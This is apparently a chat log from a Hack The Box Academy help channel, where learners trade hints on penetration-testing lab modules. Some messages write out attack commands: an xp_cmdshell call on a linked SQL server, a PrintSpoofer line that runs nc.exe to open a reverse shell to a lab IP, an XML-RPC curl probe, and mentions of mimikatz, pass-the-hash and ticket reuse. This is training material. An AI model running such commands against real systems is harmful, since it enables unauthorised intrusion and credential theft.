Good evening. I need help on the Attacking Common Services - Hard module. I figured out the linked server but I'm stuck at the commands and I receive syntax errors when I try to execute them

Anyone here completed the 'live engagement shells & payloads'?

I am also struggling with exploiting the first and second targets....

I got those without any uploads or shells... very bad labs

There is nothing wrong witht hat lab lol

Both of you can DM me. The more info you give me the faster ill reply

well I wanted to practice uploads, and got answer from a nmap scan... thats not practice! lol

@graceful rampart Sent you a PM

can someone help me with te beginner module ?

How about you ask an actual question and if someone can answer it they will

EXECUTE('xp_cmdshell 'whoami'(''sysadmin'')') AT [LOCAL.TEST.LINKED.SRV] can somebody help me fixing this? I got a syntax error and if I'm not mistaken the corresponding module won't tell me how to fix it

mixing quotes is usually bad and I have no idea where youre getting whoami("sysadmin") from as a cmdline utility

cause right now execute is basically reading it as ```'xp_cmdshell ', whoami, '("sysadmin")'

thanks. I fixed it by asking ChatGPT

I need to learn coding x_X

I got it from the "Attacking common services" module

MSSQL

Lol asking chatgpt

Skills Assessment - Web Fuzzing - 2nd question- I've found 5 extensions but can't figure out in what order I need to put them. Do I need to add dots or commas between them?

This is the worst assesment

I think it’s respectively and with commas

I didn't have to put commas in between

Hi, is there any modules, paths, etc. that deals with the burpusite tool?

"Using Web Proxies" module should get you started with the basics of using burp and zap

okey ty my friend

For anyone struggling with cme failing in "USING CRACKMAPEXEC" - "Password Spraying" - MSSQL enumeration: apply this patch: https://github.com/fortra/impacket/issues/856

Hi, anyone can help me with this? STACK-BASED BUFFER OVERFLOWS ON LINUX X86 > Determine the Length for Shellcode

Hey guys i started coding like 3 months ago and i think maybe someone can send me script of code of some program so i can stard codding and de-codding with that script thanks😀

no.

this channel is for discussing academy modules

The question is: How large can our shellcode theoretically become if we count NOPS and the shellcode size together? (Format: 00 Bytes)

Hi, I must be missing something regarding attacking DNS in attacing common services. I have two subdomains to inlanefreight after doing simple dig any. I wanted to follow the module and do a zone transfer. Not possible on any of the three domains I have. Tools like subfinder do not find anything. What am I missing?

@pliant sage Still having troubles with proxy?

IF anyone is have trouble with the module USING Web Proxies - Proxying tools, here might be a solution. IF you are following the steps and editing the proxychain.conf file to comment out the tor proxy and add the http 127.0.0.1 8080 and https also, make sure to comment out the DNS proxy in the conf file. If you do not, using proxychains will not work as the DNS resolution will fail. That or pick a DNS proxy server also if you don't comment the proxy dns part in the conf file. This should resolve the error with connections timing out when using proxychains. Also make sure you have a proxy server settup via burpsuite.

I spent 1 hour to figure out this question. The wording is confusing and needs to be corrected. The question should be : How large is our shellcode if we count NOPS and the shellcode size together? (Format: 00 Bytes). The wording "can theoretically become" in the question, it gives the idea of the potential allowed space!

did you figure it out?

nope :/

Can anyone give a nudge on Footprint Lab - Medium? I found the credentials for the SQL Management Server but I'm still unable to connect to the server. I'm curious what else I'm missing.

What other services are running

Hmm, I'm afraid that what I will explain might be a spolier. Can I DM you?

That was my nudge to you

Thanks. I'm confused by the nudge, I guess. I've found the credentials for the user that accesses SQL Manager - I guess you're saying that is a dead end? Per the hint, it seems like that is what I should be looking for.

Yes that is correct, and the path forward might not seem obvious at first but if you take a look around maybe you'll find it. Look at everything you can access/see with that user

Gotcha, thanks. I was able to access other things with their credentials but, yeah, nothing seems glaringly, or even the slightest bit obvious. I'll keep spelunking.

Another hint; check for files you can read.

Web Attacks - Bypassing Security Filters

I'm having troubles finding the correct HTTP Method.
I've tried to follow along with the module testing for test; / test%3B against the following methods:

GET
HEAD
POST
PUT
DELETE
OPTIONS
PATCH

All tests (other than HEAD since it doesn't return data) have responded with "Malicious Request Denied!".
I've tried yesterday and today. I've rebooted the target 3 times.

How close should I be sticking to the module for this section?

hey, can anyone help me with the easy skill assessment for password attacks?

"Looking for nudge towards user on Soccer,"

Solved. Hint for ZAP users...
|| Use the right Content-Type. BURP auto picks one for you.||

Can somebody give me a hand 👀 new to cyber security. Stuck on hacking wordpress. Doesn't seem clear but could be me being thick

Search for "WordPress xmlrpc attacks" and find out how to use it to execute all method calls. Enter the number of possible method calls of your target as the answer.

which module is this on?

Login

Which module? there is no academy module called Login

you DO know youre in the academy modules channel right?

Hacking wordpress

Now I'm not on the Hacking Wordpress module. But I'm working on the Web Attacks module and they refer to HTTP Methods. Could they be referencing those? Examples would be POST, GET, etc.

There's at least 9. Not that all would work specifically for xmlrpc attacks.

#boxes you'll need to verify in #bot-commands

Can I have a nudge with Attacking common services FTP ?

This section is really weird

I’m trying to connect to SSH thru hydra

what is the exact issue?

dm? 😄

Sure lmao 😂

I've done the web requests module and it's helped a little. I'm having to us -X POST -d

It asks me to Search for "WordPress xmlrpc attacks" and find out how to use it to execute all method calls. Enter the number of possible method calls of your target as the answer.

curl -X POST -d "<methodCall><methodName>system.listMethods</methodName><params><param><value>admin</value></param><param><value>CORRECT-PASSWORD</value></param></params></methodCall>"http://165.227.237.190:31181/xmlrpc.php | grep 'WordPress xmlrpc attacks'

I am stuck on Attacking DNS and I have going through I think everything listed on the module and I am getting nothing. I get AXFR record query failed when I attempt to run a zone transfer. I found what I think I was suppose to find with subbrute but now I am stuck.

stuck at what exactly?

Let me DM you

How did you solve this 👀

Again, haven't worked on Hacking Wordpress yet.

But that reads to me like there are x amount of methods that work with xmlrpc attacks. How many of those work against your target?

Just tried the one it's asked. I think I'm nearly there but not quite. I'll have a play around. Like I said I'm new to it all so it's alot to take in at mo 😅😅

Since signing up yesterday ive Smashed off Linux Fundamentals, Windows Fundamentals, web requests, network Fundamentals and javascript deobuscation. My heads going to explode 😅

It's not about how much you do at once, it's about how much you'll retain in a week/month after

I didn't realize this was a race, either.

still stuck on on Attacking Common Services - DNS I found what I think your supposed to find with gobuster and subbrute. I am stuck though what to do next and I have attempted everything. I get an error when trying to zone transfer also. I even attempted to further enumerate the sub domain that I found.

is the linux fundamentals module enough to know the basic about linux

Anyone having issues with Kerbrute getting error sending over UDP failed 😞

I mean. My experience so far is that anyone can plow through most of the modules pretty fast as long as you follow the content. And the assessments are super straightforward from whats described in each section. But until I apply it in practice in one of the machines afterwards, in a different context,I won't say I know any of it. This is not about reading and memorizing the content

actually some versions of kerbrute having problems so try different versions https://github.com/ropnop/kerbrute/releases

@cunning drum Thanks, I will try that

Attacking Common Applications - Skills Assessment II
First Question, "What is the URL of the WordPress instance?"

I fuzzed the vhost using ffuf and got 3 vhosts.
For all intents and purposes, I think b*** is the WordPress instance, but I have tried every URL and it is not correct.
All other questions are correct, only this first one is not correct and is wasting a lot of time.
Can you please give me a hint?

i think you need to also search for wordpress directory

after getting vhosts

anyone done password attack hard lab?

How can I help

this is kinda dumb but the answer need to be in this exact format http://(vhost here).inlanefreight.local

It was a URL that I tried to enter many times, but when I entered it in the format you gave me, I was able to get it correct.

What went wrong?🤔

Thanks for your kind help. Thank you.

can anyone help me with the Passwd, Shadow & Opasswd >> password attacks

i got the hash but i get this error while cracking it

your hashes are formatted wrong

that IDed good for me, your text file for it could be messed up tho

did you unshadow it properly?

okay

its working now

thanks

So after spending literally hours trying to figure out why I couldn't get the network enumeration medium lab I looked through the older messages in here and saw that it would only work if I use the browser pwnbox instead of my own VM. Extremely frustrating, but all that aside I was hoping someone more knowledgeable could explain why that specific lab doesnt work when I try to use my VM with the VPN connected

hey i never used mimikatz before whats the command of dumping hashes?

gonna learn mimikatz later currently just need it for a module

https://google.com is the command

i tired but i get an error

ERROR kuhl_m_sekurlsa_acquireLSA ; Handle on memory (0x00000005)

then research that error

Module Name: Password Attacks

Section Name: Credential Hunting in Windows

I don't know how to answer the last question, please help me. thanks. (What are the credentials to access the Edge-Router) (PS: I got it)

There is a file somewhere that has that information

can i DM you?

the file is infront of your eyes

yes ofc

Thanks. Going to go over them all again eventually or some. Just started a new job in IT doing data networking n security. Coming from a web background, htb is helping alot. Never worked in IT before, love it

Hello, how i can get "Academy user" role?

Its a race for me. I want to learn and be the best 😅

you can get a id or token thingie on academy just sync it

Module Name: INFORMATION GATHERING - WEB EDITION

Section Name: Information Gathering - Web - Skills Assessment can some one illustrate to me how to use sublist3r to preform a subdomain enumeration on githubapp.com, I tried in many ways and could not get an answer

What addressing mechanism is used at the Link Layer of the TCP/IP model?

Can someone help me with "Attacking Common Services Lab - Easy". I'm currently at the early stages where I have tried username enumeration via SMTP, FTP bruteforcing (using the list from "Resources") but nothing is hit. The web site on port 80 doesn't contains much information (I even tried directory bruteforce but the results don't have anything really useful)

i did have discussion about using that tool for that part here but i can't remember if any was able to use that tool or not but me was a lot people here just use an online tool

which module and section are you on?

hint the first thing you mention is right and if you can't get it to work try with a different ||mode||

Intro to network traffic analysis
Networking primer 1-4

oh wait so you just copy and paste the section question??

hint read the stuff under Addressing Mechanisms

🤔 I could have sworn that I have tried all the mode. Alright, let me try it again then

oh and don't forget the ||domain||

got it thanks

it's a F ing powershell command 🤣 of course cmd doesn't recognized that

if you need that use powershell command for whatever reasons then yes (hint you do)

bloody hell, for what ever reason this time it actually works!! Thanks @vital adder for the assist

Sorry, But Can i DM you?

Hello, can i dm you for asking the role?

i wonder what sort of on time delivery performance Inlanefreight has

sure

sure

thanks for reply, i got it

AD Enumeration & Attacks - Skills Assessment Part II,
i am trying to run PrintSpoofer on SQL01
xp_cmdshell c:\users\public\PrintSpoofer.exe -c "c:\users\public\nc.exe 172.16.7.240 1234 -e cmd" but it tells me "This version of c:\users\public\PrintSpoofer.exe is not compatible with the version of Windows you're running".
I checked and this windows version is 2019
so should not be a problem :/ (i also tried with JuicyPotato.exe which worked all the time and i had the same issue). Any idea by any chance?

DM me

hey guys ı wanna be hacker ı know a little bit python what shoud ı learn first

and can you share sources about it

https://academy.hackthebox.com

it has cost yo

ı dont have money

ı hav to learn with open sources

It sounds like you might be in the wrong place. This channel is for discussing modules in the academy.

where shoud ı go to then

how did you learn bro

The modules in HTB academy.

try doing some free modules first then

do books and free courses

check out the resources channels too its pretty cool

whıck courses do you suggest

I started with Cracking into hack the box

I think its a great start

definitely do cracking into hack the box

Needing a little nudge on Web Attacks-Skills Assessment,if anybody is available

I am doing the password Attacks Lab - Hard atm and I think I am missing something because I have spend 4 days on bruteforcing it and I can't simply believe that is the solution. Can some lend me their ear hear out my ennumeration and tell me what is going wrong in my mind?

Dm me

Depends on the box. Some easy boxes are actually easy, some are more like medium

@pine spoke

Can I get some assistance with Check the /tmp directory and find Julio's Kerberos ticket (ccache file). Import the ticket and read the contents of julio.txt from the domain share folder \DC01\julio. from Pass the Ticket (PtT) from Linux. I have copied over all ccache files from tmp directory to root. I have export them into KRB5CCNAME. When I attempt to connect with smbclient, I am getting error "gse_get_client_auth_token: gss_init_sec_context failed with Miscellaneous failure (see text): encryption type 0 not supported
gensec_spnego_client_negTokenInit_step: gse_krb5: creating NEG_TOKEN_INIT for cifs/dc01 failed (next[(null)]): NT_STATUS_LOGON_FAILURE" Please dm me. I have been stuggling with this error for awhile. Thank you

Need some help with DNS active enumeration module :/ I cant find the content of the txt record

If any1 have time hit me up in dm´s

Hello
I am blocked at the level of the filter evasion on the conmand injection module.
To the question:
Try all other injection operators to see if any of them is not blacklisted. Which of (new-line, &, |) is not blacklisted by the web application?

I have tried all operators, I have also inserted them in url encode but none of my answers is accepted.
Thanks in advance for any tips and help me to understand what is expected as a good answer.

maybe white-space & new-line are the similar in commands or bash

I tried both but it doesn't work

try only the injection operators not followed by commands

Yes that's what I do.
In the hint it is indicated that you only need to add the operator.
The new line operator does not return an error in burpsuite but the answer is not accepted 😦
I tried \n and %0a in the response

In this module: Pivoting, Tunneling, and Port Forwarding in the Meterpreter Tunneling & Port Forwarding section, I don't think I understand what the second question is asking:
Which of the routes that AutoRoute adds allows 172.16.5.19 to be reachable from the attack host? (Format: x.x.x.x/x.x.x.x)
Anyone done this yet, and can provide a kick in the pants?

\n = enter in burp too

ok lol
You need to write 'new-line' and not \n or %0a ...
Thanks for your help 😉

I have this same question. Did you get an answer?

Hey im stuck at pass the hash >> password attacks

question: Using Julio's hash, perform a Pass the Hash attack, launch a PowerShell console and import Invoke-TheHash to create a reverse shell to the machine you are connected via RDP (the target machine, DC01, can only connect to MS01). Use the tool nc.exe located in c:\tools to listen for the reverse shell. Once connected to the DC01, read the flag in C:\julio\flag.txt.

i tried to get a reverse shell using both tun0's ip and the other one but im not getting any reverse shell back onto the listener which is hosted on MS01

In the Attacking Common Services - Easy section, is it normal to not get an output from the "webshell"?

no idea why but yes, if you upload your shell through an ||vuln|| it's won't run normal php and for that method i end up have to use an php RCE payload with powershell

the other upload method can run php just fine

When you use intruder in burp it actually sends the file if it's a POST request right? Like in the file upload attacks. I keep getting 404's on the whitelist part, where I had no problems on blacklisting..any hints?

for this i use ffuf not burp intruder but yes it will send the file and if you are using the given command to make your wordlist hint add more or replace some of the extensions in that command

for the payload make sure you are using the 172.16.1.5 ip for MS01 and also if the command doesn't work after you import Invoke-TheHash module like in the example show also import the Invoke-WMIExec module

also if you got the flag make sure to read it 🤣

which module and section are on?

Sounds like the info gathering web edition

For the one for flaps

I just recently did that one

no idea why you have copy the ccache file before import it but after you import the file i think you should be able to klist to check the imported ticket and if you got the right ticket you should be able to use smbclient connect it also i did have some issue in smbclient after importing the ticket so i have to use -c tag to just get the flag after connect

oh yeah it does sound like the question 3 in that module

@vital adder Thank you for the tip. I did use -c in my smbclient command

and did you get the flag?

no sir.. connection error

yeah give me a sec let me give that a try

@vital adder Another person stated that I might be using the wrong ticket. I was looking at /tmp

there is a lot of ticket in /tmp

correct.. tried both julio

after you import a ticket use klist to get info of the ticket you just imported

hint one of them is ||expired|| 🤣

actually tried all

yeah. noticed that

am i doing it correct? used 171.16.1.5 still not working

seems like needs to import the other module

hint wrong domain

i don't know why the one show in the example work but just use that

the domain is not an issue

play around with the encoded payload

i just give it a try and with the right ticket now i can use smbclient to connect in and get the flag just fine

so no need for the -c thing like the last time i do this 🤣

Hi everyone, can someone help me on question 8 from Windows Command Line skill assessment, I already log in to the domain controller, but I cant find the hidden flag inside one of the loaded modules

plus I dont know what the flag may look like so I cant use sls

hey can someone give me a hint, in which folder i might look for flag.txt
module: Hacking Wordpress
section: Directory Indexing

hello could someone help me with the Web Attacks - Skills Assessment module.
Do you have any hints on how to list users and admins?
thanks

anyone that have some knowladge again about dns and axfr need some help with module /module/112/section/1069 DNS

trying to get the ip of the FDQN with last octet 203

have you logged in and explored the page?

have you explored the directories?

wp-content - is not listable
wp-includes - ive looked into it

based on the module reading, did you get to /mail-masta?

oh no i did not

0 Defensive xD

Is there any problems with pwnbox or acadamy atm my vpn and my pwn box cant reach the spawned host

Hi! Has anyone active done the skills assessment for the new File Inclusion module?

https://academy.hackthebox.com/module/details/23 this one?

yee!

have you explored the website and checked the src page?

i think that's the way i got started

if you're still stuck, i recommend visiting php filters and php wrappers section of the module

Thank you for your help! I guess we just needed to do the base64 again

Hi guys I have a question, how can i get a remote session, with a VPN, if they don't give me a password??

(I only have machine's IP)

thanks

Are you talking about connecting to the lab VPN?

yeh

You download the vpn connection file and run it with openvpn. No password needed

i am working on hackthebox.com/module/31/section/390 it wants me to give it the EBP but i don't understand from the question at what point in execution it wants the ebp. I have tried to gdb break on main and give it that ebp address but it is not the ebp it wants. can someone explain the question a bit better to me

sure? when i display ssh User@IP, it requires me a password

Yeah? thats nothing to do with the VPN then

thats dependant on what module/section youre doing

maybe finding the password is part of the scenario

OMG those of hackthebox work hard xD

so i dont know where it can be found, I'll wait to the next pwnbox

Hi guys.. New member in here 😐😐😐

i have also tried to feed it the metasploit pattern and let it seg fault from the bad EIP and use the EBP address at that time... this is also not the number it wants.

Is this the correct channel to ask for clarifications on modules in HTB Academy?

clarifications? sure

Nope, haven't got one yet.

What is a good virtual machine host software for the m1 macbook pro?

My virtualbox keeps crashing

great. i am working on 'take control of eip' and I and I am unclear what the question is a asking for at the end of the section. It wants me to give it a EBP register but the EBP register during the 'experiment' is over written. the EBP will change depending on where it is in a programs execution.

can someone explain what state i am trying to get the program in and give the ebp. the question seems open ended to me.

im using parallels but it is not free

all the question says is "Examine the registers and submit the address of EBP as the answer." but i don't understand from the context at what point in the execution i should look at the registers

@ripe terrace I put something in errata, too. Your analysis is correct, I think. TBH, there are 512 “correct” answers to that question.

hmm i want a free one 😛

Quick question for the community, I wasted hours trying to complete a relatively simple task for the firwall and IDS/IPS evasion medium lab yesterday on my VM only to figure out it would only give me the flag if I used pwnbox. Does anyone remember if the firewall IDS/IPS hard lab needs to be done on the pwnbox or can I use my VM? I don't want to waste all that time again

I was able to complete it without Pwnbox.

you should be able to do all the labs with the htb provided pwnbox. if not, make sure you download the vpn config file for it

Awesome thanks for letting me know

Yeah I've had zero issues using my VM set up with VPN config file for all the other modules, but for some reason the firewall medium lab just wouldn't give me the flag. I looked through older messages on here and saw some people report the same issue and to use the pwnbox instead and sure enough that worked perfectly. Not sure why it wouldnt work with the VM

Can anyone give me a nudge on the SQL Injection Skills assesment? I feel really dumb but i cant get past the login page 😅 . I cant get it to error no matter what I do

@deft bison friend I have already listed the users,
get the token
and change password
but I don't know how to discover the admin